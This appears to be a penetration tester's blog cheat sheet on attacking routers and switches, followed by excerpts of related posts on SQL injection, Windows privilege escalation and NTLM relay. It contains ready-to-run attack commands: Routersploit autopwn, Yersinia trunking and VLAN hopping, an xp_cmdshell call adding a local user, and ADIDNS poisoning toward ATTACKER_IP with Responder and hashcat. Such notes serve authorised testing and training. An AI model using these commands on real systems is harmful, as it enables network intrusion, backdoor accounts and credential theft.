Skip to main content

Pentesting Routers & Switches

 Penetration testing Routers & Switches


Routersploit 

Nipper-ng 

dig
nslookup
port 1999

snmpsniff (v1 is vulnerable)
test for NTP 
Routersploit

git clone https://www.github.com/threat9/routersploit.git/
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py 

search exploit 
search scanner
use scanners/autopwn
set target 10.10.10.10
Attacking Switches using Yersinia on Spanning Tree Protocol (STP)

good doc

https://github.com/tomac/yersinia

#launch GUI
yersinia -G

#

yersinia protocol -h

#Start SPN attack and capture the traffic - sensitive info will be exposed to the network
VLAN Enumeration and Hopping and Trunking 

git clone https://github.com/nccgroup/vlan-hopping.git
./frogger.sh

#VLAN hopping/ Truking can be done via yersina as well
#Create a new fake Trunk and let the switch believe that you are a trunk and ge the info via VLAN hopping
yersinia -G
go to DTP --> enable trunking

#
Test for Finger Services

finger -l 10.10.10.10
finger -l user@10.10.10.10
Test for CDP 

Cisco discovery protocol is a layer 2 protocol (doesnt work on any ports) to discover each other on same link
CDP sends - Device ID, Port ID, OS, IOS Version, capabilities and Network IP

#Capture CDP packets using TCPDump
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether[20:2] == 0x2000'

CDP Sniffer
IP Spoofing Attacks

- ARP
- RIP
- Check for internal and External IP ranges
Testing for Strict and loose Source Routing 

#loose
ping -j 10.10.10.10

#strict source routing
ping -k 10.10.10.10
Decryt Cisco Password using this script - Here 
Testing Routers

- Unused ports
- check if DHCP Snooping is enabled or not - to prevent malicious assignment of IP from rouge DHCP servers, malformed DHCP traffic
- Port Security - identifying and limiting MAC Addresses
- Correct Timestamp


References:
 
1. Testing Switches for Vulns
2. Router pentest
3. Basic Pentest
4. Pentesting SDWAN
5. Layer -2 Testing

MITM Cheatsheet

 

 

 

 

 

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/